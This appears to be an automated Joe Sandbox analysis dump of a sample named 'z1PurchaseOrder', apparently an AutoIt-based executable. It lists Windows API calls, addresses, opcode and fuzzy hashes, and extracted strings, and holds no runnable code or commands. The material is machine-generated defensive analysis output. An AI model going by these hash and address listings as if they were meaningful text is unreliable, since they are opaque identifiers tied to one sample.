                                        • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                        • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                        • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                        • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                        • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                        • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                        • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                        • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0vH$HH
                                        • API String ID: 0-728391547
                                        • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                        • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                        • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                        • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _memset
                                        • String ID:
                                        • API String ID: 2102423945-0
                                        • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                        • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                        • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                        • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                        APIs
                                        • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Proc
                                        • String ID:
                                        • API String ID: 2346855178-0
                                        • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                        • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                        • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                        • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 0045A272
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                        • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                        • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                        • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                        APIs
                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: LogonUser
                                        • String ID:
                                        • API String ID: 1244722697-0
                                        • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                        • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                        • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                        • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                        • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                        • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                        • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                        • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                        • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                        • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                        • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                        • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                        • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                        • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                        • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                        • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                        • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                        • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                        • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                        • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                        • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                        • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                        • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                        • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                        • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                        APIs
                                        • DeleteObject.GDI32(?), ref: 004593D7
                                        • DeleteObject.GDI32(?), ref: 004593F1
                                        • DestroyWindow.USER32(?), ref: 00459407
                                        • GetDesktopWindow.USER32 ref: 0045942A
                                        • GetWindowRect.USER32(00000000), ref: 00459431
                                        • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                        • GetClientRect.USER32(00000000,?), ref: 004595C8
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                        • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                        • GlobalLock.KERNEL32(00000000), ref: 00459668
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                        • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                        • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                        • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                        • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                        • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                        • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                        • GetStockObject.GDI32(00000011), ref: 004597B7
                                        • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                        • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                        • DeleteDC.GDI32(00000000), ref: 004597E1
                                        • _wcslen.LIBCMT ref: 00459800
                                        • _wcscpy.LIBCMT ref: 0045981F
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                        • GetDC.USER32(?), ref: 004598DE
                                        • SelectObject.GDI32(00000000,?), ref: 004598EE
                                        • SelectObject.GDI32(00000000,?), ref: 00459919
                                        • ReleaseDC.USER32(?,00000000), ref: 00459925
                                        • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        • API String ID: 4040870279-2373415609
                                        • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                        • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                        • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                        • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 00441E64
                                        • SetTextColor.GDI32(?,?), ref: 00441E6C
                                        • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                        • GetSysColor.USER32(0000000F), ref: 00441E8F
                                        • SetBkColor.GDI32(?,?), ref: 00441EAA
                                        • SelectObject.GDI32(?,?), ref: 00441EBA
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                        • GetSysColor.USER32(00000010), ref: 00441EF8
                                        • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                        • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                        • DeleteObject.GDI32(?), ref: 00441F1B
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                        • FillRect.USER32(?,?,?), ref: 00441FB6
                                          • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                          • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                          • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                          • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                          • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                          • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                          • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                          • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                          • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                          • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                          • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                          • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                          • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                        • String ID:
                                        • API String ID: 69173610-0
                                        • Opcode ID: 930605f3cd1c335a452d6420eef3f3c10f8d3d9e6664604232036969332d5250
                                        • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                        • Opcode Fuzzy Hash: 930605f3cd1c335a452d6420eef3f3c10f8d3d9e6664604232036969332d5250
                                        • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 1038674560-3360698832
                                        • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                        • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                        • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                        • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                        APIs
                                        • GetSysColor.USER32(0000000E), ref: 00433D81
                                        • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                        • GetSysColor.USER32(00000012), ref: 00433DA3
                                        • SetTextColor.GDI32(?,?), ref: 00433DAB
                                        • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                        • GetSysColor.USER32(0000000F), ref: 00433DCB
                                        • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                        • GetSysColor.USER32(00000011), ref: 00433DEB
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                        • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                        • SetBkColor.GDI32(?,?), ref: 00433E19
